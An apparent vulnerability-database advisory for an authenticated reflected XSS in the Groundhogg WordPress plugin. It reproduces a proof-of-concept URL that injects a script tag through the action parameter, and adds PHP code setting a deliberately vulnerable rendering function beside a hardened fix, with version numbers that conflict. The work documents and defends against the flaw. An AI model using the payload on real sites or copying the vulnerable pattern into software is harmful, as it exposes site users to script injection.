WordPress Plugin Vulnerabilities

Groundhogg < 2.0.9.11 - Authenticated Reflected XSS

Description

The WordPress Groundhogg plugin, in versions lower than 2.0.8.1, is affected by an authenticated reflected cross-site scripting (XSS) vulnerability.

Proof of Concept

# Exploit Title: Wordpress Groundhogg <= 2.0.8.1 Authenticated Reflected XSS Vulnerability
# Date: 22-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Website: https://nitesculucian.github.io
# Vendor Homepage: https://www.groundhogg.io/
# Software Link: https://wordpress.org/plugins/groundhogg/
# Version: 2.0.8.1
# Tested on: Ubuntu 18.04 / Wordpress 5.3
 
1. Description:  
 
WordPress Groundhogg plugin with a version lower than 2.0.8.1 is affected by an authenticated Reflected Cross-site scripting (XSS) vulnerability.

2. Proof of Concept: 
 
Reflected Cross-site scripting (XSS)
- Using a WordPress user, access < your_target > /wp-admin/admin.php?page=gh_bulk_jobs&action=gh_export_contacts<%2Fscript><script>alert(1)<%2Fscript>
- The response will contain:


bulk_action: 'groundhogg/bulk_job/gh_export_contacts</script><script>alert(1)</script>/ajax', items: bp.getItems(), the_end: bp.isLastOfThem() },
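
The response line above shows the `action` parameter landing inside a JavaScript string within a script block. The following is an added example, not Groundhogg's code or its actual fix: it reproduces that pattern and sets it beside a hardened version. The template shape is inferred from the response line, and all function names and the slug character set are assumptions.

```php
<?php
// Added example: not Groundhogg's code. The template shape is inferred from
// the response line in the proof of concept; function names are hypothetical.

// Vulnerable pattern: request value concatenated into a JS string literal
// inside a <script> block. No quote is needed to break out: the HTML parser
// ends the script element at the first "</script>" it sees.
function render_vulnerable(string $action): string
{
    return "<script>var job = { bulk_action: 'groundhogg/bulk_job/" . $action . "/ajax' };</script>";
}

// Hardened pattern: allowlist the identifier, then encode for the JS context.
function render_hardened(string $action): string
{
    // Keep only characters a job slug plausibly needs (assumption: [a-z0-9_]).
    $slug = preg_replace('/[^a-z0-9_]/', '', strtolower($action));
    // JSON_HEX_* turn <, >, &, ' and " into \uXXXX escapes, so the value
    // cannot close the string or the enclosing script element.
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    $value = json_encode('groundhogg/bulk_job/' . $slug . '/ajax', $flags);
    return '<script>var job = { bulk_action: ' . $value . ' };</script>';
}

// Encoding alone (no allowlist), to show the output-side control by itself.
function encode_only(string $action): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    return json_encode('groundhogg/bulk_job/' . $action . '/ajax', $flags);
}

// The action value from the proof of concept above, URL-decoded.
$action = 'gh_export_contacts</script><script>alert(1)</script>';

echo render_vulnerable($action), PHP_EOL;
echo render_hardened($action), PHP_EOL;
echo encode_only($action), PHP_EOL;

// A regression check a plugin test suite could carry.
assert(substr_count(render_vulnerable($action), '</script>') === 3);
assert(substr_count(render_hardened($action), '</script>') === 1);
assert(strpos(encode_only($action), '<') === false);
```

Inside WordPress, `sanitize_key()` and `wp_json_encode()` fill the same two roles as the allowlist and `json_encode()` calls here.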

Affects Plugins

Fixed in 2.0.9.11

Classification

Type
XSS

Miscellaneous

Original Researcher
Lucian Ioan Nitescu
Submitter
Lucian Ioan Nitescu
Verified
No

Timeline

Publicly Published
2019-10-23 (about 4 years ago)
Added
2019-10-24 (about 4 years ago)
Last Updated
2019-11-28 (about 4 years ago)
